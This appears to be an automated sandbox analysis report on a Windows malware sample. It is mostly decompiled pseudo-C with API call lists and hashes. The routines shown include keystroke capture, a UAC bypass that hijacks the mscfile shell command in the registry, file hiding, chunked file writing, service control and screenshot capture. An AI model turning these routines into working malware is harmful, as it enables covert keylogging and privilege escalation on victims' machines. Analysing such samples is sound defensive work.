                    									_t68 = E105932F7();
                    									E10592E3F( &_v1136,  &_v1100, _t136, E10596A12(_t83,  &_v1028,  &_v1100,  &_v1076, E10592E03( &_v1100), _t68));
                    									E10592E35();
                    								}
                    								E10592E35();
                    							}
                    							__eflags = E105932F7() + _t43;
                    							E105942A4(E10592F19(_t83,  &_v1076, _t131, __eflags, E10592D59(_t136), E105932F7() + _t43));
                    							E10592E35();
                    							_t49 = E105932F7();
                    							E10596A12(_t83,  &_v1040, _t131,  &_v1064, E10592E03( &_v1136), _t49);
                    							_t53 = E10592D59(_t133);
                    							_t144 = _t143 - 0x18;
                    							E10592F5A(_t83, _t144, _t131, __eflags,  &_v1076);
                    							E105A88BC(_t53);
                    							_t143 = _t144 + 0x18;
                    							E10592E35();
                    							E10592E35();
                    						} else {
                    							_t74 = E10592D59(_t133);
                    							_t75 = E105932F7();
                    							_t76 = E10592D59(_t83 + 4);
                    							_t131 = _t75 + _t75;
                    							E105A87B5(_t76, _t75 + _t75, _t74, 1);
                    						}
                    						_t136 = _t83 + 4;
                    						E1059AC37(_t83, _t83 + 4, 0x45f724);
                    						if( *((char*)(E10592E03(E10592CB7(0x46c578, _t131, _t149, 0x13)))) != 0) {
							SetFileAttributesW(E10592D59(_t133), 6); // 6 = FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM: hide the file again
                    						}
                    					}
				} while ( *((char*)(_t83 + 0x49)) != 0); // byte flag at +0x49 keeps the loop alive
                    				return 0;
                    			}
                    0x10599adf
                    0x10599ae2
                    0x10599ae2
                    0x10599ae5
                    0x10599aec
                    0x10599af0
                    0x10599af3
                    0x10599af8
                    0x10599b00
                    0x10599b05
                    0x10599b13
                    0x10599b25
                    0x10599b34
                    0x10599b34
                    0x10599b3a
                    0x10599b45
                    0x10599b4b
                    0x10599b4d
                    0x10599b5c
                    0x10599b5c
                    0x10599b70
                    0x10599b75
                    0x10599b78
                    0x10599bab
                    0x10599bb5
                    0x10599bca
                    0x10599bd7
                    0x10599bdd
                    0x10599bdf
                    0x10599be5
                    0x10599bec
                    0x10599bf1
                    0x10599bf7
                    0x10599bfc
                    0x10599bfe
                    0x10599c04
                    0x10599c27
                    0x10599c30
                    0x10599c30
                    0x10599c39
                    0x10599c39
                    0x10599c45
                    0x10599c5e
                    0x10599c67
                    0x10599c70
                    0x10599c89
                    0x10599c90
                    0x10599c95
                    0x10599ca1
                    0x10599ca8
                    0x10599cad
                    0x10599cb4
                    0x10599cbd
                    0x10599b7a
                    0x10599b7e
                    0x10599b86
                    0x10599b92
                    0x10599b97
                    0x10599b9b
                    0x10599ba1
                    0x10599cc2
                    0x10599ccc
                    0x10599ce7
                    0x10599cf3
                    0x10599cf3
                    0x10599ce7
                    0x10599cf9
                    0x10599d0b

                    APIs
                    • Sleep.KERNEL32(00001388), ref: 10599AF8
                      • Part of subcall function 10599A2E: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,10599B05), ref: 10599A64
                      • Part of subcall function 10599A2E: GetFileSize.KERNEL32(00000000,00000000,?,?,?,10599B05), ref: 10599A73
                      • Part of subcall function 10599A2E: Sleep.KERNEL32(00002710,?,?,?,10599B05), ref: 10599AA0
                      • Part of subcall function 10599A2E: CloseHandle.KERNEL32(00000000,?,?,?,10599B05), ref: 10599AA7
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 10599B34
                    • GetFileAttributesW.KERNEL32(00000000), ref: 10599B45
                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 10599B5C
                    • PathFileExistsW.SHLWAPI(00000000,00000012), ref: 10599BD7
                      • Part of subcall function 105A884A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,1059509E,0045F464), ref: 105A8867
                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0045F724), ref: 10599CF3
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                    • String ID:
                    • API String ID: 3795512280-0
                    • Opcode ID: ec40b544cd92aa40a1b15dafda3dccade50f70e30e262d14fe86580c325395a5
                    • Instruction ID: a45d6460d2fd3fc4e9bc83d64ef3fbdb7e04d608cf13f54ff670fcc496140298
                    • Opcode Fuzzy Hash: ec40b544cd92aa40a1b15dafda3dccade50f70e30e262d14fe86580c325395a5
                    • Instruction Fuzzy Hash: 3251837960434057CB05EB74DC9EABE3FA9DFC4281F00452DF542A72A1EF64BE0AC692
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • Sleep.KERNEL32(00001388), ref: 00408C8A
                      • Part of subcall function 00408BC0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408C97), ref: 00408BF6
                      • Part of subcall function 00408BC0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408C97), ref: 00408C05
                      • Part of subcall function 00408BC0: Sleep.KERNEL32(00002710,?,?,?,00408C97), ref: 00408C32
                      • Part of subcall function 00408BC0: CloseHandle.KERNEL32(00000000,?,?,?,00408C97), ref: 00408C39
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00408CC6
                    • GetFileAttributesW.KERNEL32(00000000), ref: 00408CD7
                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00408CEE
                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00408D69
                      • Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0045F724), ref: 00408E85
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                    • String ID:
                    • API String ID: 3795512280-0
                    • Opcode ID: 0962b7d6c290ae9142c192150177b04b3df9fc57785135a5f54016b418bc04ce
                    • Instruction ID: 4984a4f95f6a53c2b7ea6b9f230a8855ca3d030a8821f40474633e04f56c7365
                    • Opcode Fuzzy Hash: 0962b7d6c290ae9142c192150177b04b3df9fc57785135a5f54016b418bc04ce
                    • Instruction Fuzzy Hash: E351A3716043015BCB15FB62C9A69BF76A59F80308F04053FF942BB2E2DF7C9905869E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16_free
                    • String ID: a/p$am/pm
                    • API String ID: 2936374016-3206640213
                    • Opcode ID: d16504e75e0ea2757e68c923e6282fa821fc490f12299e6b2ab470a9fc324eef
                    • Instruction ID: abbd8f6561c5a4b1d903009bec5ef9fca0809964487b93dc44758b3fc4038faa
                    • Opcode Fuzzy Hash: d16504e75e0ea2757e68c923e6282fa821fc490f12299e6b2ab470a9fc324eef
                    • Instruction Fuzzy Hash: DAD1E0319102168AFB248F68C8957BBB7B0FF05704F24415BEA01AB7A1D77D9DC1CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E10597146(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
                    				intOrPtr _v8;
                    				char _v12;
                    				intOrPtr _v16;
                    				void* _v20;
                    				long _v24;
                    				char _v48;
                    				char _v72;
                    				void _v100076;
                    				void* __ebx;
                    				void* _t37;
                    				WCHAR* _t39;
                    				long _t46;
                    				struct _OVERLAPPED* _t58;
                    				intOrPtr _t77;
                    				long _t81;
                    				void* _t82;
                    				void* _t84;
                    				void* _t87;
                    
                    				E105E1B9E();
                    				_t74 =  &_a12;
                    				asm("xorps xmm0, xmm0");
                    				_v16 = __ecx;
                    				_t58 = 0;
                    				asm("movlpd [ebp-0x8], xmm0");
                    				_v24 = 0;
                    				E10594188(0,  &_v48, __eflags, E10598382( &_v72,  &_a12, __eflags, 0x45f804));
                    				E10592D5E();
				_t37 = CreateFileW(E10592D59( &_v48), 4, 0, 0, 2, 0x80, 0); // access 4 = FILE_APPEND_DATA, no sharing, 2 = CREATE_ALWAYS, 0x80 = FILE_ATTRIBUTE_NORMAL: a fresh temporary file
                    				_v20 = _t37;
				_t84 = _v8 - _a8; // 64-bit compare: _v8:_v12 = bytes written so far, _a8:_a4 = expected total size
				if(_t84 > 0) {
                    					L8:
					CloseHandle(_t37); // expected size reached: close the temporary file
					_t39 = E10592D59( &_a12);
					MoveFileW(E10592D59( &_v48), _t39); // and rename it to its final name (_a12)
					_t58 = 1; // success
                    				} else {
                    					_t77 = _a4;
                    					if(_t84 < 0) {
                    						goto L3;
                    					} else {
                    						_t85 = _v12 - _t77;
                    						if(_v12 >= _t77) {
                    							goto L8;
                    						} else {
                    							while(1) {
                    								L3:
								_t46 = E105959C8( &_v100076, 0x186a0); // fill the buffer with the next chunk, at most 0x186a0 = 100,000 bytes; returns the byte count
                    								_t81 = _t46;
                    								asm("cdq");
                    								_v12 = _v12 + _t46;
                    								asm("adc [ebp-0x4], edx");
								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58); // append the chunk to the temporary file
                    								_t82 = _t82 - 0x18;
                    								E10592F19(_t58, _t82, _t74, _t85,  &_v12, 8);
                    								E10595912(_t58, _v16, _t74, _t85, 0x57, _v16);
								if(_t81 <= 0) { // no more data before the expected size was reached
                    									break;
                    								}
                    								_t87 = _v8 - _a8;
                    								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
                    									continue;
                    								} else {
                    									_t37 = _v20;
                    									goto L8;
                    								}
                    								goto L9;
                    							}
							CloseHandle(_v20);
							DeleteFileW(E10592D59( &_v48)); // incomplete transfer: discard the partial temporary file
                    						}
                    					}
                    				}
                    				L9:
                    				E10592D5E();
                    				E10592D5E();
                    				return _t58;
                    			}
                    0x1059714e
                    0x10597157
                    0x1059715b
                    0x1059715e
                    0x10597161
                    0x10597163
                    0x10597170
                    0x1059717d
                    0x10597185
                    0x1059719f
                    0x105971a8
                    0x105971ab
                    0x105971ae
                    0x10597220
                    0x10597221
                    0x1059722a
                    0x10597239
                    0x1059723f
                    0x105971b0
                    0x105971b0
                    0x105971b3
                    0x00000000
                    0x105971b5
                    0x105971b5
                    0x105971b8
                    0x00000000
                    0x105971ba
                    0x105971ba
                    0x105971ba
                    0x105971c9
                    0x105971ce
                    0x105971d0
                    0x105971d1
                    0x105971d8
                    0x105971e7
                    0x105971ed
                    0x105971f8
                    0x10597202
                    0x10597209
                    0x00000000
                    0x00000000
                    0x10597211
                    0x10597214
                    0x00000000
                    0x1059721d
                    0x1059721d
                    0x00000000
                    0x1059721d
                    0x00000000
                    0x10597214
                    0x1059725d
                    0x1059726c
                    0x1059726c
                    0x105971b8
                    0x105971b3
                    0x10597241
                    0x10597244
                    0x1059724c
                    0x10597259

                    APIs
                      • Part of subcall function 10598382: char_traits.LIBCPMT ref: 1059839D
                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 1059719F
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 105971E7
                    • CloseHandle.KERNEL32(00000000), ref: 10597221
                    • MoveFileW.KERNEL32(00000000,00000000), ref: 10597239
                    • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 1059725D
                    • DeleteFileW.KERNEL32(00000000), ref: 1059726C
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                    • String ID:
                    • API String ID: 820096542-0
                    • Opcode ID: 94e1ed73948aee9412b70439699e1e5d8675887010475d2233f4173c9dc75780
                    • Instruction ID: 1f8cd8ec41595eeda5a0ce22dc3dddeaabe2ed43d2631e46924c7190be509a0f
                    • Opcode Fuzzy Hash: 94e1ed73948aee9412b70439699e1e5d8675887010475d2233f4173c9dc75780
                    • Instruction Fuzzy Hash: F8313D79D0021CABDF04DFA4DC4ADEEBB79FB84251F10856AF511B3150DB70AA49CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E10599828(void* __ecx, intOrPtr _a4) {
                    				long _v8;
                    				void _v38;
                    				short _v40;
                    				char _v296;
                    				void* __ebx;
                    				void* __edi;
                    				struct HKL__* _t20;
                    				void* _t30;
                    				signed int _t32;
                    				void* _t36;
                    
                    				_t30 = __ecx;
				E105C2D6E(_t36,  &_v296, 0, 0x100); // zero the 256-byte keyboard-state array for GetKeyboardState
                    				_v40 = 0;
                    				_t32 = 7;
				memset( &_v38, 0, _t32 << 2); // together with the stosw and _v40 this clears the 16-wchar output buffer
				asm("stosw");
				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8)); // layout of the thread owning the foreground window, so the translation matches what the victim sees
				GetKeyState(0x10); // 0x10 = VK_SHIFT; the value is discarded, the call refreshes this thread's key-state snapshot before GetKeyboardState
				GetKeyboardState( &_v296);
                    				_t9 = _t30 + 0x50; // 0x67006e
                    				_t10 = _t30 + 0x4c; // 0x69006c
                    				ToUnicodeEx( *_t10,  *_t9,  &_v296,  &_v40, 0x10, 0, _t20);
                    				E105950ED(_t30, _a4,  &_v40);
                    				return _a4;
                    			}

                    APIs
                    • GetForegroundWindow.USER32(0046BAF0,?,0046BAF0), ref: 1059985C
                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 10599867
                    • GetKeyboardLayout.USER32(00000000), ref: 1059986E
                    • GetKeyState.USER32(00000010), ref: 10599878
                    • GetKeyboardState.USER32(?), ref: 10599885
                    • ToUnicodeEx.USER32(0069006C,0067006E,?,?,00000010,00000000,00000000), ref: 105998A1
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                    • String ID:
                    • API String ID: 3566172867-0
                    • Opcode ID: bb8a0652d06275aa5c9ec138a20de8bb22a08cf53d6cac7f88a299b2aee8fae5
                    • Instruction ID: bb1f6807f0dde55fedd9879af387729e9442e814606f0d1918d12d545802bf8c
                    • Opcode Fuzzy Hash: bb8a0652d06275aa5c9ec138a20de8bb22a08cf53d6cac7f88a299b2aee8fae5
                    • Instruction Fuzzy Hash: 12110C72900208BBDB109FA4DC49FEA7BACEB48742F100465FA05E6191EA75EA54CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E105D2B50(void* __ebx, void* __ecx, void* __edx) {
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t2;
                    				void* _t3;
                    				void* _t4;
                    				intOrPtr _t9;
                    				void* _t11;
                    				void* _t20;
                    				void* _t21;
                    				void* _t23;
                    				void* _t25;
                    				void* _t27;
                    				void* _t29;
                    				void* _t31;
                    				void* _t32;
                    				long _t36;
                    				long _t37;
                    				void* _t40;
                    
                    				_t29 = __edx;
                    				_t23 = __ecx;
                    				_t20 = __ebx;
                    				_t36 = GetLastError();
                    				_t2 =  *0x46a1e0;
                    				_t42 = _t2 - 0xffffffff;
                    				if(_t2 == 0xffffffff) {
                    					L2:
                    					_t3 = E105D01B6(_t23, 1, 0x364);
                    					_t31 = _t3;
                    					_pop(_t25);
                    					if(_t31 != 0) {
                    						_t4 = E105D314D(_t25, _t36, __eflags,  *0x46a1e0, _t31);
                    						__eflags = _t4;
                    						if(_t4 != 0) {
                    							E105D29C2(_t25, _t31, 0x46b654);
                    							E105D1063(0);
                    							_t40 = _t40 + 0xc;
                    							__eflags = _t31;
                    							if(_t31 == 0) {
                    								goto L9;
                    							} else {
                    								goto L8;
                    							}
                    						} else {
                    							_push(_t31);
                    							goto L4;
                    						}
                    					} else {
                    						_push(_t3);
                    						L4:
                    						E105D1063();
                    						_pop(_t25);
                    						L9:
                    						SetLastError(_t36);
                    						E105D07B7(_t20, _t29, _t31, _t36);
                    						asm("int3");
                    						_push(_t20);
                    						_push(_t36);
                    						_push(_t31);
                    						_t37 = GetLastError();
                    						_t21 = 0;
                    						_t9 =  *0x46a1e0;
                    						_t45 = _t9 - 0xffffffff;
                    						if(_t9 == 0xffffffff) {
                    							L12:
                    							_t32 = E105D01B6(_t25, 1, 0x364);
                    							_pop(_t27);
                    							if(_t32 != 0) {
                    								_t11 = E105D314D(_t27, _t37, __eflags,  *0x46a1e0, _t32);
                    								__eflags = _t11;
                    								if(_t11 != 0) {
                    									E105D29C2(_t27, _t32, 0x46b654);
                    									E105D1063(_t21);
                    									__eflags = _t32;
                    									if(_t32 != 0) {
                    										goto L19;
                    									} else {
                    										goto L18;
                    									}
                    								} else {
                    									_push(_t32);
                    									goto L14;
                    								}
                    							} else {
                    								_push(_t21);
                    								L14:
                    								E105D1063();
                    								L18:
                    								SetLastError(_t37);
                    							}
                    						} else {
                    							_t32 = E105D30F7(_t25, _t37, _t45, _t9);
                    							if(_t32 != 0) {
                    								L19:
                    								SetLastError(_t37);
                    								_t21 = _t32;
                    							} else {
                    								goto L12;
                    							}
                    						}
                    						return _t21;
                    					}
                    				} else {
                    					_t31 = E105D30F7(_t23, _t36, _t42, _t2);
                    					if(_t31 != 0) {
                    						L8:
                    						SetLastError(_t36);
                    						return _t31;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    			}

                    APIs
                    • GetLastError.KERNEL32(?,105CA311,105C63B3,105CA311,0046DBA0,?,105C81F5,FF8BC35D,0046DBA0,?), ref: 105D2B54
                    • _free.LIBCMT ref: 105D2B87
                    • _free.LIBCMT ref: 105D2BAF
                    • SetLastError.KERNEL32(00000000,FF8BC35D,0046DBA0,?), ref: 105D2BBC
                    • SetLastError.KERNEL32(00000000,FF8BC35D,0046DBA0,?), ref: 105D2BC8
                    • _abort.LIBCMT ref: 105D2BCE
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: 0de6c08e57926f0d0e854cb5354d82f98d4efa16c4461831838b1a0959fbb3f6
                    • Instruction ID: 589e8d4016ec4c088088c04f3607f6fb0c5db9ec18d4a0b87075a085e6400574
                    • Opcode Fuzzy Hash: 0de6c08e57926f0d0e854cb5354d82f98d4efa16c4461831838b1a0959fbb3f6
                    • Instruction Fuzzy Hash: E5F0F93914174267D2016B3CAC0DE1B2F19DBE1AF2F214127F418D2391EFA0DD015766
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                    • _free.LIBCMT ref: 00441D19
                    • _free.LIBCMT ref: 00441D41
                    • SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                    • SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                    • _abort.LIBCMT ref: 00441D60
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: 8c40393d09d40aa4e2789b9edb81e7c275984eaa6ae6e5666abc2d1522f7d814
                    • Instruction ID: 66aeb2b102fda2b2bff30dbbf925b0fe681f7dccbc11a7b940bf32edba03127c
                    • Opcode Fuzzy Hash: 8c40393d09d40aa4e2789b9edb81e7c275984eaa6ae6e5666abc2d1522f7d814
                    • Instruction Fuzzy Hash: 6DF0F9B5940A0166F3023365AC05F5B12299BD177AF34012BF515922F5FF7CD852416E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00415FB6,00000000), ref: 0041641A
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00415FB6,00000000), ref: 0041642E
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041643B
                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415FB6,00000000), ref: 0041644A
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645C
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645F
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
                    • Instruction ID: 4eedda638a80435df945b1a666cb81191fe5a480f3a20e792e67f186b8beea13
                    • Opcode Fuzzy Hash: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
                    • Instruction Fuzzy Hash: 16F0F6315403187BD211AF65DC89DBF3B6CDB45B92F00002AFD0593192DF28CE4596F9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415EB6,00000000), ref: 00416585
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415EB6,00000000), ref: 00416599
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165A6
                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00415EB6,00000000), ref: 004165B5
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165C7
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165CA
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
                    • Instruction ID: f156ac7e468d3ae20af57b6ed191c57fcc92838d981ab40ed78c867a72fe8b74
                    • Opcode Fuzzy Hash: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
                    • Instruction Fuzzy Hash: 6DF0C2315413187BD211AF65EC49EBF3BACDB45B92B00002AFE0992196DA38CE4596E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _strncpy
                    • String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
                    • API String ID: 2961919466-1012175531
                    • Opcode ID: ea8a7ab8cc127f14d7f4bdee85ec441469228f4643ac61493a581d54cb0a109c
                    • Instruction ID: dce4f50b39349c7d45c0c3c8bc9e7fa21fccd2aa7cd4e7e06ea6efef67dcd24c
                    • Opcode Fuzzy Hash: ea8a7ab8cc127f14d7f4bdee85ec441469228f4643ac61493a581d54cb0a109c
                    • Instruction Fuzzy Hash: E0511336E043099BDF25DAA888817EFBBB4DF44304F18446BD944A7346E77A4D82C7D9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
                      • Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D
                    • SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7
                      • Part of subcall function 0041441B: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00414431
                      • Part of subcall function 00414493: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004144A4
                      • Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                    • DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
                    • String ID: dat$image/png$png
                    • API String ID: 1095564277-186023265
                    • Opcode ID: 0904fb4a8423eb764bf993bcc36c09851864084348f0e64832ce544b0d752fa8
                    • Instruction ID: 0c36451510116b7bd957a4aa3b7b106e47bf9e8d8c5c7fe72891902c2c8ac275
                    • Opcode Fuzzy Hash: 0904fb4a8423eb764bf993bcc36c09851864084348f0e64832ce544b0d752fa8
                    • Instruction Fuzzy Hash: 304172711183409BC314FB62C852EEFB3A9AF95358F00093FF446671E2EF385A48C69A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E10596DE5(void* __ebx, void* __ecx, void* __edx) {
                    				char _v28;
                    				char _v52;
                    				void* _t8;
                    				void* _t10;
                    				void* _t11;
                    				void* _t12;
                    				void* _t14;
                    				void* _t21;
                    				void* _t24;
                    				void* _t28;
                    				void* _t50;
                    
                    				_t28 = __ecx;
                    				if( *0x46a9d0 != 0) {
                    					return 1;
                    				}
                    				_t8 = E10596F83(__ecx);
                    				__eflags = _t8 - 0x3a9f;
                    				if(_t8 < 0x3a9f) {
                    					_push(_t28);
                    					E105A1750( &_v28, 0x80000000, 0x45f700, 0x45f6bc);
                    					_t10 = E105932F7();
                    					_t11 = E10592E03(0x46c560);
                    					_t12 = E105932F7();
                    					_t14 = E10592E03( &_v28);
                    					E105A1AEE(E10592E03(0x46c518), __eflags, "origmsc", _t14, _t12 + 1, _t11, _t10);
                    					_push(2);
                    					E105950ED(__ebx, _t50 + 0x18 - 0x18, "C:\Windows\SysWOW64\DpiScaling.exe");
                    					_push(0x45f724);
                    					E105A19BA(0x80000001, 0x45f728);
                    					E105A8E7D( &_v52, 0x34, 0x45f780);
                    					_t21 = ShellExecuteW(0, 0x45f6e4, E10592D59( &_v52), 0x45f724, 0x45f724, 0);
                    					__eflags = _t21 - 0x20;
                    					if(_t21 <= 0x20) {
                    						E10592D5E();
                    						E10592E35();
                    						_t24 = 2;
                    						return _t24;
                    					}
                    					ExitProcess(0);
                    				}
                    				return _t8;
                    			}

                    APIs
                    • ShellExecuteW.SHELL32(00000000,0045F6E4,00000000,0045F724,0045F724,00000000), ref: 10596EB4
                    • ExitProcess.KERNEL32 ref: 10596EC1
                    Strings
                    • Software\Classes\mscfile\shell\open\command, xrefs: 10596E7E
                    • C:\Windows\SysWOW64\DpiScaling.exe, xrefs: 10596E6F
                    • origmsc, xrefs: 10596E4F
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID: C:\Windows\SysWOW64\DpiScaling.exe$Software\Classes\mscfile\shell\open\command$origmsc
                    • API String ID: 1124553745-2022343456
                    • Opcode ID: 8595f50bf160042d80cae441d9c4efe332f9f09b455a7ec483d61f2392d2a6fe
                    • Instruction ID: 48de3208c6e84a80f1d80faf042cd899b60f28bfce27d64d87c62204054a064a
                    • Opcode Fuzzy Hash: 8595f50bf160042d80cae441d9c4efe332f9f09b455a7ec483d61f2392d2a6fe
                    • Instruction Fuzzy Hash: A511D239A4021567D704A7A4DC5BFBF3F5CDB88782F10002AF906A61D1EF546A4EC2EB
                    Uniqueness

                    Uniqueness Score: -1.00%
